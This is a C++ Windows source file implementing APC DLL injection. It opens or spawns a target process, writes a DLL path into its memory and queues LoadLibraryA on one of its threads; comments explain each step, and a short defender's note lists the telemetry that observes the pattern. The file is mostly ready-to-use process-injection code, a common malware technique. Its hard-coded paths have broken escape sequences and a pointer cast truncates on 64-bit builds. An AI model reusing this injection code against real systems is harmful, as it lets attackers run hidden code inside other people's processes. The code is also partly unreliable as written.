#include <iostream>
#include <Windows.h>
#include <TlHelp32.h>

using namespace std;

/*
APC injection preconditions:
    The target thread must be in an alertable state.
    It is alertable while inside APIs such as
    SleepEx, SignalObjectAndWait, WaitForSingleObjectEx, WaitForMultipleObjectsEx, MsgWaitForMultipleObjectsEx
    dwPid defaults to 0, meaning a target process is created automatically and the injection takes effect at once;
    otherwise an existing target is used and the APC callback runs when that target next becomes alertable.
*/
// Queues a LoadLibraryA user-mode APC on one thread of the target process so
// that the DLL at dllUrl is loaded in that process.
//   dllUrl - NUL-terminated ANSI path; it is copied verbatim into the target's
//            address space and used as the LoadLibraryA argument.
//   dwPid  - 0: spawn a new process (suspended) and target its primary thread;
//            otherwise: an existing process id.
//   exeUrl - not used by the implementation below (the spawned image path is
//            hard-coded in CreateProcessA).
// Returns TRUE once QueueUserAPC succeeds. A TRUE result does not confirm
// that the APC ever ran or that the DLL actually loaded.
BOOL APCInject(char *dllUrl,DWORD dwPid=0,char *exeUrl=NULL);

int main(void)
{

    cout << APCInject("c:\desktop\test.dll",3980) << endl;
    return 0;
}

// Defender's note: the sequence OpenProcess(PROCESS_ALL_ACCESS) ->
// CreateToolhelp32Snapshot/OpenThread(THREAD_ALL_ACCESS) -> VirtualAllocEx ->
// WriteProcessMemory -> QueueUserAPC(LoadLibraryA) is the textbook APC
// injection pattern. Every step is a cross-process API call that endpoint
// telemetry (ETW, EDR user-mode hooks, Sysmon CreateRemoteThread-style
// events) can observe, and the DLL path is left in plaintext in a freshly
// committed PAGE_READWRITE region of the target.
BOOL APCInject(char *dllUrl,DWORD dwPid,char *exeUrl)
{
    HANDLE hSnap=NULL,hPro=NULL,hThr=NULL;
    BOOL bOk = FALSE;
    LPVOID hVir = NULL;        // remote buffer that receives the DLL path
    THREADENTRY32 te = {0};

    if (!dwPid)
    {
        // Spawn path: the child starts CREATE_SUSPENDED so the APC is already
        // queued on its primary thread before that thread first runs.
        STARTUPINFO wi = {0};
        PROCESS_INFORMATION pi = {0};

        wi.cb = sizeof(wi);
        // Return value is not checked; on failure pi.hThread stays NULL and
        // the "if (!hThr)" test below reports FALSE.
        CreateProcessA("c:\desktop\123.exe",NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&wi,&pi);
        hPro = pi.hProcess;
        hThr = pi.hThread;
    } else {
        // Existing-process path: pick the first thread owned by dwPid.
        te.dwSize = sizeof(te);
        hPro = OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwPid);
        if (!hPro)
            return FALSE;
        // 4 == TH32CS_SNAPTHREAD. That snapshot enumerates threads of every
        // process (the pid argument is ignored for threads), hence the
        // th32OwnerProcessID filter in the loop below.
        hSnap = CreateToolhelp32Snapshot(4,dwPid);
        bOk = Thread32First(hSnap,&te);
        while (bOk)
        {
            if (te.th32OwnerProcessID == dwPid)
            {
                hThr = OpenThread(THREAD_ALL_ACCESS,FALSE,te.th32ThreadID);
                break;
            }

            bOk = Thread32Next(hSnap,&te);
        }
        CloseHandle(hSnap);
    }

    if (!hThr)
        return FALSE;
    // Allocate and fill a remote buffer holding the DLL path (including NUL).
    hVir = VirtualAllocEx(hPro,NULL,strlen(dllUrl)+1,MEM_COMMIT,PAGE_READWRITE);
    if (!hVir)
        return FALSE;
    if (!WriteProcessMemory(hPro,hVir,dllUrl,strlen(dllUrl)+1,NULL))
        return FALSE;
    // The process handle is not needed once the path is written; only the
    // thread handle is used from here on.
    CloseHandle(hPro);
    // APC routine = kernel32!LoadLibraryA, argument = remote path buffer.
    // kernel32 is assumed to be mapped at the same base in the target as in
    // this process, which is what makes the local GetProcAddress usable.
    if (QueueUserAPC((PAPCFUNC)GetProcAddress(GetModuleHandle("kernel32.dll"),"LoadLibraryA"),hThr,(DWORD)hVir))
    {
        if (!dwPid)
        {
            // Spawned target: let the primary thread run; the APC is
            // delivered as soon as the thread is alertable.
            ResumeThread(hThr);
            CloseHandle(hThr);
        }
        // Existing-process path: hThr is intentionally (or accidentally)
        // left open on success.
        return TRUE;
    }
    CloseHandle(hThr);
    return FALSE;
}